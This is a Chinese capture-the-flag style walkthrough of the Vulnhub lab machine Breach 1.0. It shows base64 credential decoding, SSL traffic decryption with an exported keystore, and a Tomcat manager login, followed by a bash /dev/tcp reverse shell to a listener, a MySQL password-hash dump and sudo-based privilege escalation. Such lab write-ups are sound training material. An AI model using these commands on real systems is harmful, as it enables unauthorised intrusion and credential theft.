Vulnhub靶场渗透练习(一) Breach1.0

来源：cnblogs　　作者：痱子﹑　　时间：2019/7/8 8:48:27　　对本文有异议

打开靶场固定ip需要更改虚拟机为仅主机模式 192.168.110.140

打开网页http://192.168.110.140/index.html

查看源代码发现可以加密字符串

猜测base64 解密 cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh 得到这个结果可能是二次加密在base64解密

得到 pgibbons:damnitfeel$goodtobeagang$ta 去除：得到两个字符串pgibbons，damnitfeel$goodtobeagang$ta

点击图片每个路径都看看发现

可以登录把刚刚拿到的两个密码进行尝试登录

登录成功发现有3个邮件

192.168.110.140/.keystore 这个地址为 ssl 加密证书的密钥库继续搜索有用文件

发现有信息泄露通过邮件信息猜测 tomcat

发现 pcap 文件为 wireshark 流量包可以下载来分析

都是加密过的可以利用前面的ssl 解密利用java 的 keytool 获取证书输入

D:\jdk\bin>keytool.exe -list -keystore

输入密钥库口令:tomcat
密钥库类型: jks
密钥库提供方: SUN

您的密钥库包含 1 个条目

tomcat, 2016-5-21, PrivateKeyEntry,
证书指纹 (SHA1): D5:D2:49:C3:69:93:CC:E5:39:A9:DE:5C:91:DC:F1:26:A6:40:46:53

Warning:
JKS 密钥库使用专用格式。建议使用 "keytool -importkeystore -srckeystore D:\jdk\keystore -destkeystore D:\jdk\keystore -deststoretype pkcs12" 迁移到行业标准格式 PKCS12。

解密出来结果

接着导出 p12 证书

输入

keytool -importkeystore -srckeystore D:\jdk\keystore -destkeystore D:\tomcatkeystore.p12 -deststoretype PKCS12
-srcalias tomcat

证书有了我们就可以查看了打开Wireshark 编辑--首选项--Protocols--SSL，点击右边的Edit：

输入：192.168.110.140 8443 http 点击选择证书文件输入密码tomcat

发现包含登录用户名密码的数据包，采用http basic认证，认证数据包为： Basic

dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC

这是base64编码的用户名密码，将 dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC 复制到Burpsuit Decoder进行解码，

得到Tomcat登录用户名密码

Tomcat后台登录用户名：tomcat，密码：Tt\5D8F(#!*u=G)4m7zB

拿到密码后可以直接登录

Tomcat 后台是直接可以获取getshell

这里上传马以后每隔3分钟会自动删除所以我们直接利用他反弹一个shell 这里可以用linux 自带的也可以用msf 生成

echo "bash -i >& /dev/tcp/192.168.110.1/4444 0>&1" | bash

本机输入 nc.exe -lvp 4444

进入项目后直接可以查看项目寻找到两个特殊文件

看到mysql 的用户密码

输入

mysql -u root -p 回车密码空在回车

mysql -u root -p

use mysql;

select user,password from user;

exit

发现 milton 用户去 etc/passwd

发现对应用户猜测就是这个用户密码

到 https://www.somd5.com/ 解密，得到用户milton的明文密码：thelaststraw

切换 su -milton 用户

无法执行su命令，显示需要一个终端，之前都遇到这个问题，通过Python解决：

python -c 'import pty;pty.spawn("/bin/bash")'

接着查询这个用户能否sudo 执行

sudo -l

没发现可利用的再从新找线索

uname -a

系统内核版本为：Linux Breach 4.2.0-27-generic，不存在Ubuntu本地提权漏洞。存在本地提权漏洞内核版本是：Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)

查找历史命令发现

su提权到了blumbergh用户。需要找到blumbergh用户的密码。将可用的资源文件下载发现

bill.png 底部是插入编码可能是二次隐藏密码

tEXtComment 和coffeestains

利用这两个尝试登录

登录成功

用户名：blumbergh 密码：coffeestains

查sudo 权限

blumbergh@Breach:~$ sudo -l
sudo -l
Matching Defaults entries for blumbergh on Breach:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User blumbergh may run the following commands on Breach:
(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh

能够以root 权限执行

/usr/bin/tee /usr/share/cleanup/tidyup.sh

在去查看历史命令

发现/usr/share/cleanup和tidyup.sh脚本文件：

执行

cd / 
blumbergh@Breach:/$ cd usr
cd usr
blumbergh@Breach:/usr$ cd share
cd share
blumbergh@Breach:/usr/share$ cd cleasnup
cd cleasnup
-su: cd: cleasnup: No such file or directory
blumbergh@Breach:/usr/share$ cd cleanup
cd cleanup

cat tidyup.sh

得到

#!/bin/bash
#Hacker Evasion Script
#Initech Cyber Consulting, LLC
#Peter Gibbons and Michael Bolton - 2016
#This script is set to run every 3 minutes as an additional defense measure against hackers.
cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf